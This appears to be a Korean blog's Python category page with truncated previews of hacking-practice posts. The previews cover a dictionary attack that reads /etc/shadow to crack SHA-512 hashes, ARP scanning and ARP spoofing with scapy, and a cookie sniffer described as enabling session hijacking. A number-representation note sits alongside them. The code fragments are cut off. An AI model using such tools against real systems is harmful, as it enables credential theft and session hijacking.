본문 바로가기

Programming/Python6

Dictionary Attack - SHA-512는 $6을 포함하여 11자리를 사용자가 입력한 패스워드와 해쉬화한다. 123456789101112131415161718192021222324252627282930313233343536373839404142import sysimport osimport crypt account={} def arg_check(argv): if (len(argv)) != 2 : print('Usage : crack [Dictionary_file]') sys.exit(1) if os.path.isfile(argv[1]) != 1 : print('No such Dictionary_file') sys.exit(1) def main(): with open('/etc/shadow', 'r') as s_f : while .. 2020. 3. 4.
ARP를 이용한 host scan 123456789101112131415161718192021222324252627282930313233343536373839404142from scapy.all import *import threadingimport os host_list = {}num = 0threadLock = threading.Lock()threads = [] def printHosts(host_list): print('-------------------------- HOST LIST --------------------------') print('NUM IP MAC') print('---------------------------------------------------------------') for num in host_li.. 2020. 2. 24.
ARP Spoofing 12345678910111213141516171819202122232425262728293031323334353637383940from scapy.all import *import threadingimport os host_list = {}num = 0threadLock = threading.Lock()threads = [] def printHosts(host_list): print('-------------------------- HOST LIST --------------------------') print('NUM IP MAC') print('---------------------------------------------------------------') for num in host_list: .. 2020. 2. 24.
cookie를 이용한 로그인 http://itlearner.tistory.com/293 와 http://itlearner.tistory.com/352 에서 포스팅했듯이 쿠키로도 로그인이 가능합니다. 아래는 쿠키정보를 빼내는 코드(화이트 해커를 위한 암호와 해킹 서적 참고)입니다.이를 이용하면 세션 탈취가 가능합니다. 참고로 이러한 쿠키값 도용은 희생자가 로그인하고 있을 동안만 가능합니다. 123456789101112131415161718from scapy.all import *import re def cookieSniffer(packet): tcp = packet.getlayer('TCP') cookie = re.search(r'Cookie: (.+)\\r\\n', str(tcp.payload)) if cookie: print(co.. 2018. 7. 18.
살아있는 호스트 IP 스캔하기 같은 네트워크 대역에 살아있는 호스트의 IP를 스캔하는 소스를 작성해 보려고 한다. 찾아보니 방법은 아래와 같이 나왔다.1. ping을 이용하는 방법(ICMP Echo Reply를 보내오는 호스트가 살아있는 것으로 판별)2. 특정 포트로 메시지를 보내는 방법(Port Unreachable를 보내오는 호스트가 살아있는 것으로 판별) 이중에서 나는 ping을 이용하는 방법을 선택했다.ping을 이용하는 방법에도 찾아보니 여러가지가 있었다.1. pyping 모듈의 ping을 이용2. os모듈의 system을 이용3. ICMP Echo Request 패킷을 직접 만들기나는 이중에서 ICMP Echo Request 패킷을 직접 만들어 보기로 결정했다. 일단 참고하기 위해서 wireshark로 ping패킷을 잡아봤.. 2018. 2. 13.
1의 보수와 2의 보수 음수 표현 방법- 부호절대값, 1의보수, 2의보수 - 컴퓨터는 덧셈만 할 수 있게 설계되어져 있음 그렇다면 뺄셈은? 2의 보수를 이용함 부호절대값: 8비트 이진수에서 가장 왼쪽에 있는 비트를 부호비트 0이면 양수, 1이면 음수 ex) 00000011(2) -> 3(10) 10000011(2) -> -3(10) (한 비트를 부호비트로 사용하기 때문에 8비트로 나타낼 수 있는 수가 상대적으로 적음) 표현 범위 : - (2^n - 1) ~ 2^n - 1 n의 보수: n이 되기 위해 보충해줘야 하는 수ex) 30의 100의 보수는 70 1의보수 (11111111 - 해당 수): 이진수의 각 자리 수가 1이 되기 위해 보충해줘야 하는 수 ex) 0 1 0 1 0 1 0 1 의 1의 보수는 1 0 1 0 1 0 1.. 2017. 1. 20.